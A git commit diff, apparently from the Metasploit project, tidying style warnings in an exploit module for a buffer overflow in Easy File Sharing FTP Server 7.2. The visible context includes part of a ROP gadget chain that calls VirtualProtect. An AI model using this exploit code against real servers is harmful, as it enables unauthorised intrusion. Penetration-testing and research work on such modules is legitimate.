corrected msftidy warnings

bug/bundler_fix
Mzack9999 2017-06-17 22:58:47 +02:00
parent 31a5cc94b2
commit 7fb36edd50
1 changed files with 2 additions and 3 deletions

View File

@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' =>
'Author' =>
[
'bl4ck h4ck3r', #POC
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
],
],
'License' => MSF_LICENSE,
'References' =>
[
@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]